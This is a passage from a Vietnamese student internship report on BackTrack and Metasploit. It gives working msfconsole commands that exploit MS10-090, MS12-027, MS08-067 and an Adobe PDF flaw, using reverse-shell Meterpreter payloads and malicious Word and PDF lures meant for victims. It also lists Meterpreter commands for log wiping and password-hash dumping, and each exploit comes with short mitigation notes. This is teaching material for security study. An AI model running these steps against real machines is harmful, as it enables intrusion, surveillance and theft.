dạng shared project (.DLL) files. Meterpeter và các thành phần mở rộng được inject vào trong bộ nhớ RAM, hoàn
toàn không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống virus.
Tập lệnh trong meterpreter:
help: Hiển thị menu giúp đỡ.
Background: đưa về msf promt và meterpreter được chạy nền.
cat: Hiển thị nội dung của một file.
cd & pwd: chuyển đổi các thư mục hiện hành tại máy victim.
clearev: xóa toàn bộ log của Application, System and Security trên hệ điều hành Windows.
download: tiến hành download một file từ victim về máy. Sử dụng “” khi thao tác với các đường dẫn.
edit: edit một file ở máy victim. Sử dụng trình soạn thảo vim để edit.
execute: chạy một lệnh trên máy victim.
getuid hiển thị thong tin user hiện tại meterpreter đang làm việc trên máy victim
hashdump xem nội dung của SAM database
idletime hiển thị thời gian mà người dung ở máy victim đã không hoạt động.
ipconfig hiển thị các interface và các địa chỉ IP ở máy victim
lpwd & lcd thay đổi thư mục hiện hành tại máy local
ls hiển thị danh sách các file trong thư mục hiện hành ở máy victim.
migrate đính meterpreter vào một process khác đang hoạt động ở máy victim
ps hiển thị các process đang hoạt động ở máy victim
resource chạy các lệnh meterpreter được định nghĩa trong một text file
search tìm kiếm file trên máy victim
shell tiến hành thao tác với shell của máy victim
upload upload một file từ local lên máy vicim. Sử dụng “” khi thao tác với các đường dẫn trên.
webcam_list hiển thị danh sách các webcam có thể sử dụng ở máy victim
webcam_snap chụp ảnh bằng webcam ở máy victim.
Ở đề tài nhóm chủ yếu tập trung vào khai thác bằng payload này.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 24 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Tiến hành khai thác các lỗ hổng trên Windows XP qua localhost
Kết quả cuối cùng của việc khai thác các lỗ hổng này là tạo được một session với máy victim và đính payload
meterpreter vào máy victim để chiếm quyền điều khiển và có thể tiến hành cài backdoor vào máy nạn nhân.
Khai thác lỗi MS10-090: lỗi của MSHTML trong trình duyệt IE6, IE7
Targets: Internet Explorer 6 hoặc 7
Chuẩn bị môi trường: Máy backtrack và máy victim có cài đặt IE6 hoặc IE7
Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig
Ta được IP của Backtrack : 192.168.24.128
Khởi động Metasploit của Backtrack bằng lệnh : msfconsole
Tìm kiếm mã lỗi trên Metasploit bằng lệnh : search ms10_090
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 25
Sau khi search được mã lỗi ta dùng lệnh : use windows/brower/ms10_090_ie_css_clip
Dùng lệnh show options để thể hiện các thuộc tính cần thiết của mã lỗi.
Sau khi biết các thuộc tính cần thêm vào, ta thiết lập các thuộc tính sau :
set SRVHOST 192.168.24.128
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.24.128
set uripath /hack
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 26 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Dùng lệnh exploit để tiến hành khai thác lỗi. Backtrack sẽ tạo ra một link http://192.168.24.128:8080/hack khi máy
XP truy cập vào địa chỉ này sẽ tạo một session đến máy backtrack.
Quay lại máy XP, mở trình duyệt IE và truy cập vào địa chỉ http://192.168.24.128:8080/hack
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 27
Trên máy Backtrack bắt đầu có sự kết nối tới XP. Chúng ta đợi đến khi có địa chỉ kết nối vào ta sẽ tạo phiên kết nối.
Dùng lệnh sessions để kiểm tra.
Dùng lệnh sessions –i 1 để kết nối vao sessions 1.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 28 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Đến bước này meterpreter đã được inject vào trong máy của victim và ta có thể sử dụng các lệnh meterpreter thao
tác lên máy victim.
Cách phòng tránh:
 Không vào các đường link lạ, không rõ nguồn gốc.
 Sử dụng phiên bản mới nhất của Internet Explorer hoặc sử dụng các trình duyệt khác như Chrome, Firefox, …
Khai thác lỗi MS12_027: lổ hổng MS-Office 2007, 2010
Targets: Microsoft Office 2007, 2010
Chuẩn bị môi trường: Máy backtrack và máy victim Windows XP hoặc Windows 7 có cài đặt Microsoft Office 2007
hoặc 2010
Ta kiểm tra IP trên máy Backtrack bằng lệnh : ifconfig
Ta được IP của Backtrack : 192.168.24.128
Khởi động Metasploit và sử dụng lệnh để load mã lỗi
use exploit/windows/fileformat/ms12_027_mscomclt_bof
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 29
Dùng lệnh: show options để xem cái option của mã lỗi
Thiết lập file mang mã độc dùng lệnh : set FILENAME report.doc
Thiết lập PAYLOAD
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.24.138
set LPORT 4443
Cuối cùng ta dùng lệnh exploit để tạo file word đã được đính mã độc. Sau khi có được file word này ta sẽ gửi cho nạn
nhân và tiến hành lắng nghe kết nối tại máy backtrack. Để bắt đầu lắng nghe kết nối ta dùng các lệnh sau:
use exploit/multi/handler
set LPORT 4443 /* Port này giống với port lúc tạo file mã độc */
exploit
Sau bước này, bất cứ khi nào victim mở file Word chứa mã độc thì ta sẽ có được một session với máy victim tiếp theo
ta sẽ làm việc với meterpreter để chiếm quyền điều khiển máy victim.
Cách phòng tránh
 Không xem những tài liệu được gửi đến từ người lạ, có nguồn gốc không rõ.
 Cập nhập bản vá lỗi cho MS-Word hoặc sử dụng phiên bản mới nhất của Microsoft Word (2013) hoặc một phần
mềm soạn thảo văn bản khác như Open Office.
Khai thác lỗi của Adobe Reader
Targets: Máy Adobe Reader v8.x, v9.x
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 30 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP SP3 có cài đặt và dử dụng Adobe Reader
v8.x hoặc v9.x
Khởi động Metasploit của Backtrack bằng lệnh : msfconsole
Dùng lệnh
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Dùng lệnh show options để thể hiện các thuộc tính mã lỗi
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 31
Tiếp theo ta set INFIENAME:
set INFIENAME /home/target.pdf
/* Đây là file PDF bình thường không chứa mã độc */
set FILENAME evil.pdf
/* Đây là file PDF bình thường đã được đính kèm mã độc và sẽ được gửi đi cho victim */
exploit
Sau khi exploit file PDF nhận được, là file PDF bình thường đã được đính mã độc vào.
Tiếp theo ta tiến hành lắng nghe kết nối từ victim.
use exploit/multi/handler
set lport 4443
exploit
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 32 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Cách phòng tránh
Lỗi này có thể dễ dành nhận biết được khi tiến hành mở file PDF.
Tại khung File, nếu để ý kỹ phần phía trên đoạn text này sẽ chứa một
đoạn mã rất dài và được cover lại bằng một đoạn text trống để nạn
nhân khó nhận biết được.
Để ngăn chặn việc tấn công ta chỉ cần ấn Do Not Open là sẽ chặn được
việc khai thác này.
Đây thực chất không phải là lỗ hổng hay lỗi của phần mềm mà đây là
một chức năng của Adobe Reader, nhưng chức năng này đã bị hacker lợi dụng cho mục đích xấu. Nên người dùng cần
phải hết sức thận trọng.
Khai thác mã lỗi MS08_067: lỗ hổng của hệ điều hành Windows XP
Targets: Windows XP tất cả các Service Pack
Môi trường chuẩn bị: Máy backtrack và máy victim sử dụng Windows XP
Tiến hành khai thác:
use exploit/windows/smb/ms08_067_netapi
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 33
Dùng lệnh show options để hiển thị các thông số cần cài đặt và tiến hành cài đặt các thông số này.
set RHOST 192.168.174.130
Cài đặt PAYLOAD với các thông số và tiến hành khai thác.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.174.128
exploit
Cách phòng tránh:
Đây là một lỗi rất nguy hiểm vì khi bị hacker tấn công, ở máy nạn nhân không hề có bất kỳ dấu hiệu nào đáng ngờ. Vì
thế cần thiết phải update bản vá lỗi cho Windows XP để tránh khỏi việc bị tấn công.
Thông tin chi tiết về mã lỗi xem tại
https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 34 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
Tấn công qua mạng Internet, triển khai trên VPS
VPS là gì
Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo.
Trong khi trên một server chạy một Share Host thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server
chạy VPS thì con số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể restart
lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn
công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server, riêng server VPS, một tài khoản
trên VPS bị tấn công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.
VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, nếu chạy trên Share Host sẽ
không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình
server,….
Đặc điểm VPS
Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung lượng RAM riêng, dung lượng ổ
HDD riêng, địa chỉ IP riêng và hệ điều hành riêng.
Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.
Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng khác thì có thể cài đặt để thực hiện
những yêu cầu riêng như truy cập Web bằng trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…
Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên mà không cần phải khởi động lại hệ
thống.
Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.
Giá trị sử dụng của VPS
Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS phù hợp.
Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.
Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.
Được cấu hình và cài đặt hệ thống Firewall và Ddos Protection.
Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
Khai thác thông qua VPS
Việc khai thác thông qua VPS được tiến hành thực hiện tương tự trên localhost.
Nhưng đối với VPS sử dụng hệ điều hành Windows ta phải tiến hành cài đặt phần mềm Metasploit và tiến hành khai
thác như trên Backtrack.
Metasploit có thể download tại đây: http://www.metasploit.com/
Giao diện của Metasploit trên Windows
TRƯỜNG ĐẠI HỌC BÁCH KHOA – TRUNG TÂM ĐÀO TẠO QUẢN TRỊ & AN NINH MẠNG ATHENA
Chương trình thực tập công nghiệp 2 Trang 35
KẾT QUẢ ĐẠT ĐƯỢC SAU QUÁ TRÌNH THỰC TẬP
Trong suốt quá trình thực tập tại Trung tâm đào tạo quản trị & an ninh mạng Athena em đã có thêm nhiều kinh
nghiệm.
 Về kiến thức: ôn lại kỹ năng đã học, nâng cao khả năng học hỏi, trao dồi thêm nguồn kiến thức mới.
 Về kỹ năng tổ chức điều hành công việc: có cơ hội làm việc nhóm để rèn luyện kỹ năng làm việc nhóm tốt
hơn và khả năng phân chia công việc để hoàn thành đúng tiến độ.
 Về thái độ, trách nhiệm: có trách nhiệm với công việc, luôn hoàn thành mục tiêu đặt ra.
GVHD: Võ Đỗ Thắng Nghiên cứu và sử dụng các công cụ BackTrack để kiểm tra an ninh mạng
Trang 36 Nhóm sinh viên: Phạm Minh Đạt – Dương Thế Hiển
TÀI LIỆU THAM KHẢO
Tài liệu tham khảo chủ yếu của trung tâm Athena và một số nguồn khác.
http://www.hackingarticles.in
https://www.youtube.com
http://www.hackyshacky.com
i Nguồn: http://athena.edu.vn/home/gioi-thieu-athena.html
ii Nguồn: Sách CEH Lab Book – Trung tâm đào tạo quản trị & an ninh mạng Athena
iii Nguồn: http://www.windowsecurity.com/whitepapers/windows_security/Windows-Enumeration-USER2SID-SID2USER.html

Contenu connexe

Tendances

luan van tot nghiep ke toan (40).pdf
luan van tot nghiep ke toan (40).pdfluan van tot nghiep ke toan (40).pdf
luan van tot nghiep ke toan (40).pdfNguyễn Công Huy
 
Báo cáo Thực tập tốt nghiệp - BVTech
Báo cáo Thực tập tốt nghiệp - BVTechBáo cáo Thực tập tốt nghiệp - BVTech
Báo cáo Thực tập tốt nghiệp - BVTechMan_Ebook
 
Nghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylase
Nghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylaseNghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylase
Nghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylaseTÀI LIỆU NGÀNH MAY
 
đề Tài xây dựng hệ cỡ số trang phục áo sơ mi nam
đề Tài xây dựng hệ cỡ số trang phục áo sơ mi namđề Tài xây dựng hệ cỡ số trang phục áo sơ mi nam
đề Tài xây dựng hệ cỡ số trang phục áo sơ mi namTÀI LIỆU NGÀNH MAY
 
Luận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencv
Luận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencvLuận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencv
Luận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencvDịch vụ viết thuê Luận Văn - ZALO 0932091562
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
BaocaothuctapcuoikyTrần Nam
 
Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...
Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...
Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...nataliej4
 
Thực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdf
Thực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdfThực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdf
Thực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdfMan_Ebook
 

Tendances (16)

Đề tài: Thiết kế tuyến đường qua hai điểm T11-T12 tỉnh Đak Lak
Đề tài: Thiết kế tuyến đường qua hai điểm T11-T12 tỉnh Đak LakĐề tài: Thiết kế tuyến đường qua hai điểm T11-T12 tỉnh Đak Lak
Đề tài: Thiết kế tuyến đường qua hai điểm T11-T12 tỉnh Đak Lak
 
luan van tot nghiep ke toan (40).pdf
luan van tot nghiep ke toan (40).pdfluan van tot nghiep ke toan (40).pdf
luan van tot nghiep ke toan (40).pdf
 
Hệ thống quản lý tiền lương và chất lượng giảng dạy của giảng viên
Hệ thống quản lý tiền lương và chất lượng giảng dạy của giảng viênHệ thống quản lý tiền lương và chất lượng giảng dạy của giảng viên
Hệ thống quản lý tiền lương và chất lượng giảng dạy của giảng viên
 
Báo cáo Thực tập tốt nghiệp - BVTech
Báo cáo Thực tập tốt nghiệp - BVTechBáo cáo Thực tập tốt nghiệp - BVTech
Báo cáo Thực tập tốt nghiệp - BVTech
 
Đề tài ngành Luật: Pháp luật bảo vệ tài nguyên đất đai, 9 Đ,HAY
Đề tài ngành Luật: Pháp luật bảo vệ tài nguyên đất đai, 9 Đ,HAYĐề tài ngành Luật: Pháp luật bảo vệ tài nguyên đất đai, 9 Đ,HAY
Đề tài ngành Luật: Pháp luật bảo vệ tài nguyên đất đai, 9 Đ,HAY
 
Đề tài: Thiết kế và thi công máy cho tôm ăn, HAY, 9đ
Đề tài: Thiết kế và thi công máy cho tôm ăn, HAY, 9đĐề tài: Thiết kế và thi công máy cho tôm ăn, HAY, 9đ
Đề tài: Thiết kế và thi công máy cho tôm ăn, HAY, 9đ
 
Nghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylase
Nghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylaseNghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylase
Nghiên cứu ứng dụng nấm mốc từ bánh men đề thu nhận enzym amylase
 
Đề tài: Tính toán bảo vệ rơle cho trạm biến áp 110kV, HOT
Đề tài: Tính toán bảo vệ rơle cho trạm biến áp 110kV, HOTĐề tài: Tính toán bảo vệ rơle cho trạm biến áp 110kV, HOT
Đề tài: Tính toán bảo vệ rơle cho trạm biến áp 110kV, HOT
 
Luận văn: Lập trình nhúng ARM trên Linux, HOT, 9đ
Luận văn: Lập trình nhúng ARM trên Linux, HOT, 9đLuận văn: Lập trình nhúng ARM trên Linux, HOT, 9đ
Luận văn: Lập trình nhúng ARM trên Linux, HOT, 9đ
 
đề Tài xây dựng hệ cỡ số trang phục áo sơ mi nam
đề Tài xây dựng hệ cỡ số trang phục áo sơ mi namđề Tài xây dựng hệ cỡ số trang phục áo sơ mi nam
đề Tài xây dựng hệ cỡ số trang phục áo sơ mi nam
 
Đề tài: Tính toán, lựa chọn rơle bảo vệ cho trạm biến áp 110 kV
Đề tài: Tính toán, lựa chọn rơle bảo vệ cho trạm biến áp 110 kVĐề tài: Tính toán, lựa chọn rơle bảo vệ cho trạm biến áp 110 kV
Đề tài: Tính toán, lựa chọn rơle bảo vệ cho trạm biến áp 110 kV
 
Luận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencv
Luận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencvLuận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencv
Luận văn Thạc sĩ Xây dựng ứng dụng phát hiện khuôn mặt trong ảnh sử dụng opencv
 
Baocaothuctapcuoiky
BaocaothuctapcuoikyBaocaothuctapcuoiky
Baocaothuctapcuoiky
 
Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...
Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...
Xây dựng nền tảng học liệu mở cho giáo dục đại học Việt Nam – Đề xuất chính s...
 
Thực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdf
Thực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdfThực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdf
Thực hành kiến trúc và tổ chức máy tính - Phạm Văn Khoa.pdf
 
Đề tài: Khai thác văn hóa tộc người Cơ Tu ở tỉnh Quảng Nam, HAY
Đề tài: Khai thác văn hóa tộc người Cơ Tu ở tỉnh Quảng Nam, HAYĐề tài: Khai thác văn hóa tộc người Cơ Tu ở tỉnh Quảng Nam, HAY
Đề tài: Khai thác văn hóa tộc người Cơ Tu ở tỉnh Quảng Nam, HAY
 

Similaire à Báo cáo cuối kỳ Athena - Report

Thiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdf
Thiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdfThiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdf
Thiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdfMan_Ebook
 
Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...
Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...
Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...https://www.facebook.com/garmentspace
 
ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...
ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...
ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...nataliej4
 
Luận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du Lịch
Luận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du LịchLuận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du Lịch
Luận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du LịchViết Thuê Luận Văn Luanvanpanda.com
 
Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...
Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...
Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...https://www.facebook.com/garmentspace
 
Xu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcm
Xu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcmXu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcm
Xu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcmPhuquy Nguyen
 
Nâng cao khả năng điều khiển của bộ Anfis bằng giải thuật Pso
Nâng cao khả năng điều khiển của bộ Anfis bằng giải thuật PsoNâng cao khả năng điều khiển của bộ Anfis bằng giải thuật Pso
Nâng cao khả năng điều khiển của bộ Anfis bằng giải thuật PsoMan_Ebook
 
ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT...
 ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT... ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT...
ĐÓNG GÓP CỦA VỐN XÃ HỘI VÀO CÁC HOẠT ĐỘNG CỦA DOANH NGHIỆP BẤT ĐỘNG SẢN VIỆT...anh hieu
 
Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...
Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...
Luận Văn Quản Trị Tài Chính Khi Hình Thành Thị Trường Điện Ứng Dụng Trong Tổn...Nhận Viết Đề Tài Thuê trangluanvan.com
 
Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...
Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...
Quản lý hệ thống xếp hạng tín dụng cá nhân tại ngân hàng TMCP Kiên Long chi n...Man_Ebook
 
Nghiên cứu quy trình sản xuất natto từ đậu nành việt nam
Nghiên cứu quy trình sản xuất natto từ đậu nành việt namNghiên cứu quy trình sản xuất natto từ đậu nành việt nam
Nghiên cứu quy trình sản xuất natto từ đậu nành việt namhttps://www.facebook.com/garmentspace
 

Similaire à Báo cáo cuối kỳ Athena - Report (20)

Thiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdf
Thiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdfThiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdf
Thiết kế và chế tạo robot vệ sinh tấm pin năng lượng mặt trời.pdf
 
Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...
Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...
Khảo sát ảnh hưởng của dung môi tách chiết đến hoạt tính kháng khuẩn của cao ...
 
ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...
ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...
ảNh hưởng của hệ thống kiểm soát nội bộ và công nghệ thông tin đến hiệu quả q...
 
Luận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du Lịch
Luận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du LịchLuận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du Lịch
Luận Văn Ảnh Hưởng Của Truyền Miệng Trực Tuyến Đến Ý Định Mua Tour Du Lịch
 
Khoá Luận Pháp Luật Về An Toàn Vệ Sinh Lao Động 9 Điểm.
Khoá Luận Pháp Luật Về An Toàn Vệ Sinh Lao Động 9 Điểm.Khoá Luận Pháp Luật Về An Toàn Vệ Sinh Lao Động 9 Điểm.
Khoá Luận Pháp Luật Về An Toàn Vệ Sinh Lao Động 9 Điểm.
 
Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...
Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...
Khảo sát hiện trạng sử dụng và đánh giá dư lượng của glyphosate trong các tra...
 
Tác Động Của Văn Hóa Tổ Chức Đến Động Lực Phụng Sự Công Của Cán Bộ, Công Chức
Tác Động Của Văn Hóa Tổ Chức Đến Động Lực Phụng Sự Công Của Cán Bộ, Công ChứcTác Động Của Văn Hóa Tổ Chức Đến Động Lực Phụng Sự Công Của Cán Bộ, Công Chức
Tác Động Của Văn Hóa Tổ Chức Đến Động Lực Phụng Sự Công Của Cán Bộ, Công Chức
 
Đề tài: Giải pháp hoàn thiện quy trình phục vụ bàn tại nhà hàng The White
Đề tài: Giải pháp hoàn thiện quy trình phục vụ bàn tại nhà hàng The WhiteĐề tài: Giải pháp hoàn thiện quy trình phục vụ bàn tại nhà hàng The White
Đề tài: Giải pháp hoàn thiện quy trình phục vụ bàn tại nhà hàng The White
 
Xu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcm
Xu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcmXu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcm
Xu huong mua sam truc tuyen cua sinh vien tren dia ban tp. hcm
 
Luận văn: Quản lí các trường ĐH ngoài công lập tại TPHCM, HAY
Luận văn: Quản lí các trường ĐH ngoài công lập tại TPHCM, HAYLuận văn: Quản lí các trường ĐH ngoài công lập tại TPHCM, HAY
Luận văn: Quản lí các trường ĐH ngoài công lập tại TPHCM, HAY
 
Đề tài nhân tố tác động đến hệ số giá trên thu nhập, HAY, ĐIỂM 8
Đề tài nhân tố tác động đến hệ số giá trên thu nhập, HAY, ĐIỂM 8Đề tài nhân tố tác động đến hệ số giá trên thu nhập, HAY, ĐIỂM 8
Đề tài nhân tố tác động đến hệ số giá trên thu nhập, HAY, ĐIỂM 8
 
Báo Cáo Thực Tập Giải Pháp Mở Rộng Thị Trường Xuất Khẩu Sản Phẩm Thép
Báo Cáo Thực Tập Giải Pháp Mở Rộng Thị Trường Xuất Khẩu Sản Phẩm ThépBáo Cáo Thực Tập Giải Pháp Mở Rộng Thị Trường Xuất Khẩu Sản Phẩm Thép
Báo Cáo Thực Tập Giải Pháp Mở Rộng Thị Trường Xuất Khẩu Sản Phẩm Thép
 
Nâng cao khả năng điều khiển của bộ Anfis bằng giải thuật Pso
Nâng cao khả năng điều khiển của bộ Anfis bằng giải thuật PsoNâng cao khả năng điều khiển của bộ Anfis bằng giải thuật Pso
Nâng cao khả năng điều khiển của bộ Anfis bằng giải thuật Pso
 
Các Nhân Tố Tác Động Đến Áp Dụng Chuẩn Mực Kế Toán Quốc Tế IasIfrs
Các Nhân Tố Tác Động Đến Áp Dụng Chuẩn Mực Kế Toán Quốc Tế IasIfrsCác Nhân Tố Tác Động Đến Áp Dụng Chuẩn Mực Kế Toán Quốc Tế IasIfrs
